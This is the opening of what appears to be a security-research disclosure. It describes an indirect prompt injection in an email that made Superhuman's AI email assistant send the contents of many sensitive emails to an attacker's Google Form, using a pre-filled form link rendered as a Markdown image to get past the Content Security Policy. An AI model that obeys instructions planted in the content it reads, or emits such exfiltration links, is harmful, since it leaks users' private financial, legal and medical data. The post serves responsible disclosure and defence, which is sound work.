Superhuman AI exfiltrates emails

Grammarly recently acquired Superhuman and Coda. The PromptArmor Threat Intelligence Team examined the new risk profile and identified indirect prompt injection vulnerabilities allowing for the exfiltration of emails and data from integrated services, as well as phishing risks, with vulnerabilities affecting products across the suite.

In this article, we walk through the following vulnerability (before discussing additional findings across the Superhuman product suite):

When asked to summarize the user’s recent mail, a prompt injection in an untrusted email manipulated Superhuman AI to submit content from dozens of other sensitive emails (including financial, legal, and medical information) in the user’s inbox to an attacker’s Google Form.

We reported these vulnerabilities to Superhuman, who quickly escalated the report and promptly remediated risks, addressing the threat at ‘incident pace’. We greatly appreciate Superhuman’s professional handling of this disclosure, showing dedication to their users’ security and privacy, and commitment to collaboration with the security research community. Their responsiveness and proactiveness in disabling vulnerable features and communicating fix timelines exhibited a security response in the top percentile of what we have seen for AI vulnerabilities (which are not yet well understood with existing remediation protocols).

Superhuman whitelisted Google Docs in its Content Security Policy. We used it as a bypass. By manipulating the AI to generate a pre-filled Google form submission link and output it using Markdown image syntax, the AI made automatic submissions to an attacker-controlled Google form.

We validated that an attacker can exfiltrate the full contents of multiple sensitive emails in one response, containing financials, privileged legal info, and sensitive medical data. We additionally exfiltrated partial contents from over 40 emails with a single AI response.

... continue reading